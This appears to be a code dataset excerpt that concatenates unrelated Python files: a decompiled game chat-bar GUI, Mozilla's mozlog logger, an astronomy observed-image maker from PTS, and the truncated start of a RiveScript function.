optiondefs = (('modelName', 'general_frame_c', None), ('frameSize', (0, 0.745, 0.0, 0.11), None), ('borderScale', 0.13500000000000001, None), ('bgBuffer', 0.14000000000000001, None))
self.defineoptions(kw, optiondefs)
TopTab.__init__(self, tabBar, name, **kw)
self.initialiseoptions(ChatTab)
class WhisperTabBar(TabBar):
def refreshTabs(self):
for (x, name) in enumerate(self.tabOrder):
tab = self.tabs[name]
tab.setPos(0.070000000000000007 + 0.71999999999999997 * (x + self.offset), 0, 0.059999999999999998)
tab.reparentTo(self.bParent)
for name in reversed(self.tabOrder):
tab = self.tabs[name]
tab.reparentTo(self.bParent)
self.activeIndex = max(0, min(self.activeIndex, len(self.tabOrder) - 1))
if len(self.tabOrder):
name = self.tabOrder[self.activeIndex]
tab = self.tabs[name]
tab.reparentTo(self.fParent)
tab.setZ(0.076999999999999999)
def makeTab(self, name, **kw):
newWhisperTab = WhisperTab(self, name, **kw)
if hasattr(self, 'percentage'):
newWhisperTab.setBoxWidth(self.percentage)
return newWhisperTab
class ChatBar(DirectFrame, FSM):
def __init__(self, parent, chatMgr, whiteListEntry, *args, **kw):
optiondefs = (('relief', None, None), ('state', DGG.DISABLED, None), ('frameSize', (0, 1, 0, 0.75), None), ('frameColor', (1, 0, 1, 0.20000000000000001), None))
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent, *args, **kw)
self.initialiseoptions(ChatBar)
FSM.__init__(self, 'ChatBar')
if base.config.GetBool('whitelist-chat-enabled', 1):
pass
self.whiteListEnabled = base.cr.accountDetailRecord.WLChatEnabled
self.openChatEnabled = base.cr.accountDetailRecord.canOpenChatAndNotGetBooted()
if not self.whiteListEnabled:
pass
self.noChat = not (self.openChatEnabled)
self.chatTabs = None
self.whisperTabs = None
self.chatMgr = chatMgr
self.slideIval = None
self.whisperNameLabel = None
self.whisperPrefixLabel = None
self.percentage = 1.0
self.iPercentage = 1.0
self.myTextScale = PiratesGuiGlobals.TextScaleLarge * 1.1000000000000001
self.setupGui(whiteListEntry)
self.request('Hidden')
def destroy(self):
self.cleanup()
self.stopSlideIval()
DirectFrame.destroy(self)
self.cleanupGui()
self.chatMgr = None
def setBoxWidth(self, percentage):
iPercentage = 1.0 / percentage
self.setScale(percentage, 1.0, 1.0)
self.chatTabs.setBoxWidth(percentage)
self.speedButton.setScale(iPercentage, 1.0, 1.0)
self.emoteButton.setScale(iPercentage, 1.0, 1.0)
self.startChatButton.setScale(iPercentage, 1.0, 1.0)
self.percentage = percentage
self.iPercentage = iPercentage
if self.whisperNameLabel:
self.whisperNameLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
self.whisperNameLabel['text_pos'] = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0)
if self.whisperPrefixLabel:
self.whisperPrefixLabel['text_scale'] = (self.myTextScale * iPercentage, self.myTextScale, self.myTextScale)
def setupGui(self, whiteListEntry):
self.stopSlideIval()
if self.chatTabs:
self.chatTabs.destroy()
if self.whisperTabs:
self.whisperTabs.destroy()
self.removeChildren()
gui = loader.loadModel('models/gui/chat_frame_b')
skullbg = loader.loadModel('models/gui/chat_frame_a')
skullbg2 = loader.loadModel('models/gui/chat_frame_a')
skullgui = loader.loadModel('models/gui/chat_frame_skull')
emoteGfxbg = loader.loadModel('models/gui/chat_frame_a')
icons = loader.loadModel('models/gui/toplevel_gui')
charGui = loader.loadModel('models/gui/char_gui')
scale = Vec3(0.20000000000000001, 1.0, 0.20000000000000001)
offset = (0.5, 0, 0.38)
speedChatBg = self.attachNewNode('speedChatBg')
skullbg.find('**/pPlane11').reparentTo(speedChatBg)
speedChatBg.setScale(scale)
speedChatBg.setPos(*offset)
speedChatBg.flattenStrong()
emoteBg = self.attachNewNode('emoteBg')
skullbg2.find('**/pPlane11').reparentTo(emoteBg)
emoteBg.setScale(scale)
emoteBg.setPos(0.59099999999999997, 0, 0.38)
emoteBg.flattenStrong()
self.chatEntryBackground = self.attachNewNode('chatEntryBackground')
self.chatEntryBackground.setX(-0.90000000000000002)
self.backTabParent = self.chatEntryBackground.attachNewNode('backTabs')
textEntryGeom = self.chatEntryBackground.attachNewNode('textEntryBg')
gui.find('**/pPlane12').reparentTo(textEntryGeom)
textEntryGeom.setScale(scale)
textEntryGeom.setPos(*offset)
textEntryGeom.flattenStrong()
self.chatEntryVisNode = textEntryGeom.attachNewNode('chatEntryVis')
self.chatEntryVisNode.hide()
self.chatEntryVisNode.setAlphaScale(0)
whiteListEntry.reparentTo(self.chatEntryVisNode)
if self.noChat:
def noshow():
pass
whiteListEntry.show = noshow
whiteListEntry.hide()
else:
whiteListEntry.setPos(0.20000000000000001, 0, 0.035999999999999997)
self.frontTabParent = self.chatEntryBackground.attachNewNode('frontTab', sort = 2)
self.speedButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon'), icons.find('**/chat_bubble_icon_over')), geom_scale = 0.25, pos = (0.14000000000000001, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateSpeedChat)
self.emoteButton = DirectButton(parent = self, relief = None, frameSize = (-0.055, 0.044999999999999998, -0.055, 0.044999999999999998), geom = (charGui.find('**/*head'), charGui.find('**/*head'), charGui.find('**/*head_over')), geom_scale = 0.29999999999999999, pos = (0.049000000000000002, 0, 0.044999999999999998), rolloverSound = None, command = self.chatMgr.activateEmoteChat)
tGui = loader.loadModel('models/gui/triangle')
triangle = (tGui.find('**/triangle'), tGui.find('**/triangle_down'), tGui.find('**/triangle_over'))
self.startChatButton = DirectButton(parent = self, relief = None, image = triangle, image_scale = 0.065000000000000002, pos = (0.23100000000000001, 0.0, 0.050000000000000003), rolloverSound = None, command = self.chatMgr.activateChat)
self.chatTabs = ChatTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
allTab = self.chatTabs.addTab('All', label = PLocalizer.ChatTabAll, command = self.chatMgr.activateChat, extraArgs = [
'All'])
crewTab = self.chatTabs.addTab('Crew', label = PLocalizer.ChatTabCrew, command = self.chatMgr.activateChat, extraArgs = [
'Crew'])
guildTab = self.chatTabs.addTab('Guild', label = PLocalizer.ChatTabGuild, command = self.chatMgr.activateChat, extraArgs = [
'Guild'])
shipPVPTab = self.chatTabs.addTab('ShipPVP', label = PLocalizer.ChatTabShipPVP, command = self.chatMgr.activateChat, frameSize = (0, 0.23999999999999999, 0.0, 0.10000000000000001), textMayChange = 1, extraArgs = [
'ShipPVP'])
self.chatTabs.stash()
self.whisperTabs = WhisperTabBar(parent = self, backParent = self.backTabParent, frontParent = self.frontTabParent)
whisperNameTab = self.whisperTabs.addTab('Name')
whisperCancelTab = self.whisperTabs.addTab('Cancel', command = self.whisperCanceled)
self.whisperTabs.stash()
whisperCancelTab['frameSize'] = (0, 0.105, 0.0, 0.11)
self.whisperPrefixLabel = DirectLabel(parent = whisperNameTab, relief = None, state = DGG.DISABLED, text = PLocalizer.ProfilePageWhisper + ':', text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.033000000000000002, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
DirectLabel(parent = whisperCancelTab, relief = None, state = DGG.DISABLED, text = 'X', text_scale = (self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999, self.myTextScale * 1.1799999999999999), text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG1, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.052999999999999999, 0.042999999999999997, 0), text_font = PiratesGlobals.getInterfaceFont())
self.whisperTabs.stash()
self.request('Hidden')
def cleanupGui(self):
self.whisperPrefixLabel = None
self.chatEntryBackground = None
self.backTabParent = None
self.frontTabParent = None
self.speedButton = None
self.emoteButton = None
self.startChatButton = None
if self.chatTabs:
self.chatTabs.destroy()
self.chatTabs = None
if self.whisperTabs:
self.whisperTabs.destroy()
self.whisperTabs = None
def whisperCanceled(self):
self.chatMgr.whisperCanceled()
def refreshTabStates(self):
if self.getCurrentOrNextState() not in ('Off', 'Hidden', 'Whisper'):
if not self.chatMgr.crewChatAllowed:
self.chatTabs.getTab('Crew').stash()
else:
self.chatTabs.getTab('Crew').unstash()
if not self.chatMgr.guildChatAllowed:
self.chatTabs.getTab('Guild').stash()
else:
self.chatTabs.getTab('Guild').unstash()
if not self.chatMgr.shipPVPChatAllowed:
self.chatTabs.getTab('ShipPVP').stash()
else:
self.chatTabs.getTab('ShipPVP').unstash()
def stopSlideIval(self):
if self.slideIval and self.slideIval.isPlaying():
self.slideIval.pause()
def enterHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.setAlphaScale, 0), Func(self.chatEntryVisNode.hide), self.chatEntryBackground.posInterval(0.25, Point3(-0.90000000000000002, 0, 0), blendType = 'easeIn'), Func(self.startChatButton.show), Func(self.chatEntryBackground.hide))
self.slideIval.start()
def exitHidden(self):
self.stopSlideIval()
self.slideIval = Sequence(Func(self.chatEntryVisNode.show), Func(self.chatEntryBackground.show), Func(self.startChatButton.hide), self.chatEntryBackground.posInterval(0.25, Point3(0, 0, 0), blendType = 'easeOut'), Func(self.chatEntryVisNode.setAlphaScale, 1))
self.slideIval.start()
def enterAll(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('All')
self.refreshTabStates()
def exitAll(self):
pass
def enterCrew(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Crew')
self.refreshTabStates()
def exitCrew(self):
pass
def enterGuild(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('Guild')
self.refreshTabStates()
def enterShipPVP(self):
self.chatTabs.unstash()
self.whisperTabs.stash()
self.chatTabs.selectTab('ShipPVP')
self.refreshTabStates()
def exitShipPVP(self):
pass
def exitGuild(self):
pass
def enterWhisper(self, avatarName = 'John Sharkbait', whisperId = 0):
self.whisperName = avatarName
self.whisperId = whisperId
self.chatTabs.stash()
self.whisperTabs.unstash()
if self.whisperNameLabel:
self.whisperNameLabel.destroy()
self.whisperNameLabel = DirectLabel(parent = self.whisperTabs.getTab('Name'), relief = None, state = DGG.DISABLED, text = avatarName, text_scale = (self.myTextScale * self.iPercentage, self.myTextScale, self.myTextScale), text_align = TextNode.ALeft, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_pos = (0.20999999999999999 * self.iPercentage, 0.040000000000000001, 0), text_font = PiratesGlobals.getInterfaceFont())
def exitWhisper(self):
self.whisperName = ''
self.whisperId = 0
if self.whisperNameLabel and 0:
self.whisperNameLabel.destroy()
self.whisperNameLabel = None
| [((803, 846), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (818, 846), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((1500, 1520), 'pirates.piratesgui.TabBar.TopTab.destroy', 'TopTab.destroy', (['self'], {}), '(self)\n', (1514, 1520), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((2557, 2575), 'pirates.piratesgui.TabBar.TabBar.stash', 'TabBar.stash', (['self'], {}), '(self)\n', (2569, 2575), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((3031, 3074), 'pirates.piratesgui.TabBar.TopTab.__init__', 'TopTab.__init__', (['self', 'tabBar', 'name'], {}), '(self, tabBar, name, **None)\n', (3046, 3074), False, 'from pirates.piratesgui.TabBar import TopTab, TabBar\n'), ((4503, 4532), 'direct.fsm.FSM.FSM.__init__', 'FSM.__init__', (['self', '"""ChatBar"""'], {}), "(self, 'ChatBar')\n", (4515, 4532), False, 'from direct.fsm.FSM import FSM\n'), ((1381, 1414), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (1412, 1414), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11416, 11449), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11447, 11449), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((11863, 11896), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (11894, 11896), False, 'from pirates.piratesbase import PiratesGlobals\n'), ((15660, 15693), 'pirates.piratesbase.PiratesGlobals.getInterfaceFont', 'PiratesGlobals.getInterfaceFont', ([], {}), '()\n', (15691, 15693), False, 'from pirates.piratesbase import PiratesGlobals\n')] |
lucashmorais/x-Bench | mozmill-env/python/Lib/site-packages/mozlog/logger.py | 2080b8753dd6e45c2212666bcdb05327752a94e9 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from logging import getLogger as getSysLogger
from logging import *
# Some of the build slave environments don't see the following when doing
# 'from logging import *'
# see https://bugzilla.mozilla.org/show_bug.cgi?id=700415#c35
from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig
import json
_default_level = INFO
_LoggerClass = getLoggerClass()
# Define mozlog specific log levels
START = _default_level + 1
END = _default_level + 2
PASS = _default_level + 3
KNOWN_FAIL = _default_level + 4
FAIL = _default_level + 5
CRASH = _default_level + 6
# Define associated text of log levels
addLevelName(START, 'TEST-START')
addLevelName(END, 'TEST-END')
addLevelName(PASS, 'TEST-PASS')
addLevelName(KNOWN_FAIL, 'TEST-KNOWN-FAIL')
addLevelName(FAIL, 'TEST-UNEXPECTED-FAIL')
addLevelName(CRASH, 'PROCESS-CRASH')
class MozLogger(_LoggerClass):
"""
MozLogger class which adds some convenience log levels
related to automated testing in Mozilla and ability to
output structured log messages.
"""
def testStart(self, message, *args, **kwargs):
"""Logs a test start message"""
self.log(START, message, *args, **kwargs)
def testEnd(self, message, *args, **kwargs):
"""Logs a test end message"""
self.log(END, message, *args, **kwargs)
def testPass(self, message, *args, **kwargs):
"""Logs a test pass message"""
self.log(PASS, message, *args, **kwargs)
def testFail(self, message, *args, **kwargs):
"""Logs a test fail message"""
self.log(FAIL, message, *args, **kwargs)
def testKnownFail(self, message, *args, **kwargs):
"""Logs a test known fail message"""
self.log(KNOWN_FAIL, message, *args, **kwargs)
def processCrash(self, message, *args, **kwargs):
"""Logs a process crash message"""
self.log(CRASH, message, *args, **kwargs)
def log_structured(self, action, params=None):
"""Logs a structured message object."""
if params is None:
params = {}
level = params.get('_level', _default_level)
if isinstance(level, int):
params['_level'] = getLevelName(level)
else:
params['_level'] = level
level = getLevelName(level.upper())
# If the logger is fed a level number unknown to the logging
# module, getLevelName will return a string. Unfortunately,
# the logging module will raise a type error elsewhere if
# the level is not an integer.
if not isinstance(level, int):
level = _default_level
params['action'] = action
# The message can be None. This is expected, and shouldn't cause
# unstructured formatters to fail.
message = params.get('_message')
self.log(level, message, extra={'params': params})
class JSONFormatter(Formatter):
"""Log formatter for emitting structured JSON entries."""
def format(self, record):
# Default values determined by logger metadata
output = {
'_time': int(round(record.created * 1000, 0)),
'_namespace': record.name,
'_level': getLevelName(record.levelno),
}
# If this message was created by a call to log_structured,
# anything specified by the caller's params should act as
# an override.
output.update(getattr(record, 'params', {}))
if record.msg and output.get('_message') is None:
# For compatibility with callers using the printf like
# API exposed by python logging, call the default formatter.
output['_message'] = Formatter.format(self, record)
return json.dumps(output, indent=output.get('indent'))
class MozFormatter(Formatter):
"""
MozFormatter class used to standardize formatting
If a different format is desired, this can be explicitly
overridden with the log handler's setFormatter() method
"""
level_length = 0
max_level_length = len('TEST-START')
def __init__(self, include_timestamp=False):
"""
Formatter.__init__ has fmt and datefmt parameters that won't have
any effect on a MozFormatter instance.
:param include_timestamp: if True, include formatted time at the
beginning of the message
"""
self.include_timestamp = include_timestamp
Formatter.__init__(self)
def format(self, record):
# Handles padding so record levels align nicely
if len(record.levelname) > self.level_length:
pad = 0
if len(record.levelname) <= self.max_level_length:
self.level_length = len(record.levelname)
else:
pad = self.level_length - len(record.levelname) + 1
sep = '|'.rjust(pad)
fmt = '%(name)s %(levelname)s ' + sep + ' %(message)s'
if self.include_timestamp:
fmt = '%(asctime)s ' + fmt
# this protected member is used to define the format
# used by the base Formatter's method
self._fmt = fmt
return Formatter.format(self, record)
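# Rough output shape (illustrative): a record on logger "suite" at level
# TEST-PASS renders as "suite TEST-PASS | some message", with the "|"
# padded so that differently sized level names stay aligned.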
def getLogger(name, handler=None):
"""
Returns the logger with the specified name.
If the logger doesn't exist, it is created.
If handler is specified, adds it to the logger. Otherwise a default handler
that logs to standard output will be used.
:param name: The name of the logger to retrieve
:param handler: A handler to add to the logger. If the logger already exists,
and a handler is specified, an exception will be raised. To
add a handler to an existing logger, call that logger's
addHandler method.
"""
setLoggerClass(MozLogger)
if name in Logger.manager.loggerDict:
if handler:
raise ValueError('The handler parameter requires ' + \
'that a logger by this name does ' + \
'not already exist')
return Logger.manager.loggerDict[name]
logger = getSysLogger(name)
logger.setLevel(_default_level)
if handler is None:
handler = StreamHandler()
handler.setFormatter(MozFormatter())
logger.addHandler(handler)
logger.propagate = False
return logger
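# Example usage (added for illustration; the logger name and messages are
# hypothetical):
#
# logger = getLogger('mozlog.example')
# logger.testStart('test_foo.py')
# logger.log_structured('test_end', {'_message': 'test_foo.py finished',
#                                    '_level': 'INFO'})
#
# Attaching a handler with JSONFormatter instead makes log_structured emit
# one JSON object per record rather than the MozFormatter text format.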
| [((581, 597), 'logging.getLoggerClass', 'getLoggerClass', ([], {}), '()\n', (595, 597), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((866, 899), 'logging.addLevelName', 'addLevelName', (['START', '"""TEST-START"""'], {}), "(START, 'TEST-START')\n", (878, 899), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((900, 929), 'logging.addLevelName', 'addLevelName', (['END', '"""TEST-END"""'], {}), "(END, 'TEST-END')\n", (912, 929), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((930, 961), 'logging.addLevelName', 'addLevelName', (['PASS', '"""TEST-PASS"""'], {}), "(PASS, 'TEST-PASS')\n", (942, 961), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((962, 1005), 'logging.addLevelName', 'addLevelName', (['KNOWN_FAIL', '"""TEST-KNOWN-FAIL"""'], {}), "(KNOWN_FAIL, 'TEST-KNOWN-FAIL')\n", (974, 1005), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((1006, 1048), 'logging.addLevelName', 'addLevelName', (['FAIL', '"""TEST-UNEXPECTED-FAIL"""'], {}), "(FAIL, 'TEST-UNEXPECTED-FAIL')\n", (1018, 1048), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((1049, 1085), 'logging.addLevelName', 'addLevelName', (['CRASH', '"""PROCESS-CRASH"""'], {}), "(CRASH, 'PROCESS-CRASH')\n", (1061, 1085), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((6036, 6061), 'logging.setLoggerClass', 'setLoggerClass', (['MozLogger'], {}), '(MozLogger)\n', (6050, 6061), False, 'from logging import getLoggerClass, addLevelName, setLoggerClass, shutdown, debug, info, basicConfig\n'), ((6371, 6389), 'logging.getLogger', 'getSysLogger', (['name'], {}), '(name)\n', (6383, 6389), True, 'from logging import getLogger as getSysLogger\n')] |
wdobbels/CAAPR | CAAPR/CAAPR_AstroMagic/PTS/pts/core/misc/images.py | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.misc.fluxes Contains the ObservedImageMaker class.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import astronomical modules
from astropy.units import Unit
from astropy import constants
# Import the relevant PTS classes and modules
from ..tools.logging import log
from ..tools import filesystem as fs
from ..basics.filter import Filter
from ...magic.core.image import Image
from ...magic.core.frame import Frame
from ...magic.basics.coordinatesystem import CoordinateSystem
from ..tools.special import remote_filter_convolution, remote_convolution_frame
# -----------------------------------------------------------------
# The speed of light
speed_of_light = constants.c
# -----------------------------------------------------------------
class ObservedImageMaker(object):
"""
This class ...
"""
def __init__(self):
"""
The constructor ...
:return:
"""
# Call the constructor of the base class
super(ObservedImageMaker, self).__init__()
# -- Attributes --
# The simulation prefix
self.simulation_prefix = None
# The paths to the 'total' FITS files produced by SKIRT
self.fits_paths = None
# The wavelengths of the simulation
self.wavelengths = None
# Filter names
self.filter_names = ["FUV", "NUV", "u", "g", "r", "i", "z", "H", "J", "Ks", "I1", "I2", "I3", "I4", "W1", "W2",
"W3", "W4", "Pacs 70", "Pacs 100", "Pacs 160", "SPIRE 250", "SPIRE 350", "SPIRE 500"]
# The instrument names
self.instrument_names = None
# The filters for which the images should be created
self.filters = dict()
# The dictionary containing the images for various SKIRT output datacubes
self.images = dict()
# The reference WCS
self.wcs = None
# -----------------------------------------------------------------
def run(self, simulation, output_path=None, filter_names=None, instrument_names=None, wcs_path=None, kernel_paths=None, unit=None, host_id=None):
"""
This function ...
:param simulation:
:param output_path:
:param filter_names:
:param instrument_names:
:param wcs_path:
:param kernel_paths:
:param unit:
:param host_id:
:return:
"""
# Obtain the paths to the 'total' FITS files created by the simulation
self.fits_paths = simulation.totalfitspaths()
# Get the list of wavelengths for the simulation
self.wavelengths = simulation.wavelengths()
# Get the simulation prefix
self.simulation_prefix = simulation.prefix()
# Set the filter names
if filter_names is not None: self.filter_names = filter_names
# Set the instrument names
self.instrument_names = instrument_names
# Create the filters
self.create_filters()
# Make the observed images
self.make_images(host_id)
# Set the WCS of the created images
if wcs_path is not None: self.set_wcs(wcs_path)
# Convolve the image with a given convolution kernel
if kernel_paths is not None:
# Check whether the WCS for the image is defined. If not, show a warning and skip the convolution
if wcs_path is None: log.warning("WCS of the image is not defined, so convolution cannot be performed (the pixelscale is undefined)")
else: self.convolve(kernel_paths, host_id)
# Convert the units (WCS has to be loaded!)
if unit is not None: self.convert_units(unit)
# Write the results
if output_path is not None: self.write(output_path)
# -----------------------------------------------------------------
def create_filters(self):
"""
This function ...
:return:
"""
# Inform the user
log.info("Constructing the filter objects ...")
# Loop over the different filter names
for filter_name in self.filter_names:
# Debugging
log.debug("Constructing the " + filter_name + " filter ...")
# Create the filter
fltr = Filter.from_string(filter_name)
# Add the filter to the list
self.filters[filter_name] = fltr
# -----------------------------------------------------------------
def make_images(self, host_id=None):
"""
This function ...
:param host_id:
:return:
"""
# Inform the user
log.info("Making the observed images (this may take a while) ...")
# Loop over the different simulated images
for path in self.fits_paths:
# Get the name of the instrument
instr_name = instrument_name(path, self.simulation_prefix)
# If a list of instruments is defined an this instrument is not in this list, skip it
if self.instrument_names is not None and instr_name not in self.instrument_names: continue
# Get the name of the datacube (as given by SKIRT)
datacube_name = fs.strip_extension(fs.name(path))
# Debugging
log.debug("Making the observed images for " + datacube_name + ".fits ...")
# Create a dictionary to contain the observed images for this FITS file
images = dict()
# The filter convolution is performed remotely
if host_id is not None:
# Upload the datacube, wavelength grid and filter properties, perform the convolution on the remote and get the resulting image frames back (as a dictionary where the keys are the filter names)
frames = remote_filter_convolution(host_id, path, self.wavelengths, self.filters)
# Add the resulting image frames to the dictionary
for filter_name in frames:
# Add the observed image to the dictionary
images[filter_name] = frames[filter_name]
# The calculation is performed locally
else:
# Load the simulated image
datacube = Image.from_file(path, always_call_first_primary=False)
# Convert the frames from neutral surface brightness to wavelength surface brightness
for l in range(len(self.wavelengths)):
# Get the wavelength
wavelength = self.wavelengths[l]
# Determine the name of the frame in the datacube
frame_name = "frame" + str(l)
# Divide this frame by the wavelength in micron
datacube.frames[frame_name] /= wavelength
# Set the new unit
datacube.frames[frame_name].unit = "W / (m2 * arcsec2 * micron)"
# Convert the datacube to a numpy array where wavelength is the third dimension
fluxdensities = datacube.asarray()
# Loop over the different filters
for filter_name in self.filters:
fltr = self.filters[filter_name]
# Debugging
log.debug("Making the observed image for the " + str(fltr) + " filter ...")
# Calculate the observed image frame
data = fltr.convolve(self.wavelengths, fluxdensities)
frame = Frame(data)
# Set the unit of the frame
frame.unit = "W/(m2 * arcsec2 * micron)"
# Add the observed image to the dictionary
images[filter_name] = frame
# Add the dictionary of images of the current datacube to the complete images dictionary (with the datacube name as a key)
self.images[datacube_name] = images
# -----------------------------------------------------------------
def set_wcs(self, wcs_path):
"""
This function ...
:param wcs_path:
:return:
"""
# TODO: allow multiple paths (in a dictionary) for the different datacubes (so that for certain instruments the WCS should not be set on the simulated images)
# Inform the user
log.info("Setting the WCS of the simulated images ...")
# Debugging
log.debug("Loading the coordinate system from '" + wcs_path + "' ...")
# Load the WCS
self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
| [((12455, 12469), 'astropy.units.Unit', 'Unit', (['"""micron"""'], {}), "('micron')\n", (12459, 12469), False, 'from astropy.units import Unit\n'), ((13037, 13047), 'astropy.units.Unit', 'Unit', (['"""sr"""'], {}), "('sr')\n", (13041, 13047), False, 'from astropy.units import Unit\n'), ((13050, 13065), 'astropy.units.Unit', 'Unit', (['"""arcsec2"""'], {}), "('arcsec2')\n", (13054, 13065), False, 'from astropy.units import Unit\n')] |
Hazemcodes/GimmyBot | venv/Lib/site-packages/rivescript/inheritance.py | f24cb90e0d3c045100f59def1d5e14bef367cba7 | # RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
